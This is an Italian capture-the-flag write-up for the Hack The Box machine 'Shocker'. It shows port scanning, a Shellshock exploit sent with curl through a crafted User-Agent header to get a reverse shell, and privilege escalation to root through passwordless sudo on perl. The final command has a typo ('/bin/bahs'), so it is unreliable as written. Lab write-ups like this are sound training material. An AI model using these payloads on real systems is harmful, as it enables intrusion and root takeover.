Shocker – HacKTheBox

Hack The Box Hack The Box

Iniziamo subito con la scansione delle porte con

nmap -sV -sC -oN nmap 10.10.10.56

Notiamo che sono aperte le porte 80(http) e 2222(ssh)

Andando a vedere sulla porta 80 non troviamo nulla di interessante.

Usando un tool come dirsearch, wfuzz,gobuster o dirbuster notiamo che c’è un file all’interno di /cgi-bin/ chiamata user.sh

Questo file è vulnerabile a shellsock .

Ci sono due modi per exploitare questa macchina

Metodo automatico

Scaricando da https://github.com/BREAKTEAM/Debcrypt.git e lanciando shellshock.py con

./shocker.py -H 10.10.10.56 –cgi /cgi-bin/user.sh

da qui possiamo utilizzare qualsiasi comando e ottenere cosi una reverse shell

Metodo manuale

È possibile exploitare questa macchiana usando curl

curl -H “user-agent: () { :; }; echo; echo; /bin/bash -c ‘<Inserire_una_reverse_shell>’ ” http://10.10.10.56/cgi-bin/user.sh

Otterremo così una reverse shell dell’utente shelly

Privilege escalation

Con

sudo -l

notiamo che perl viene eseguito come root senza richiedere la password

Eseguendo /bin/bash con perl otterremo una shell di root

sudo perl -e ‘exec(“/bin/bahs”)’

Categorie: CTF

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *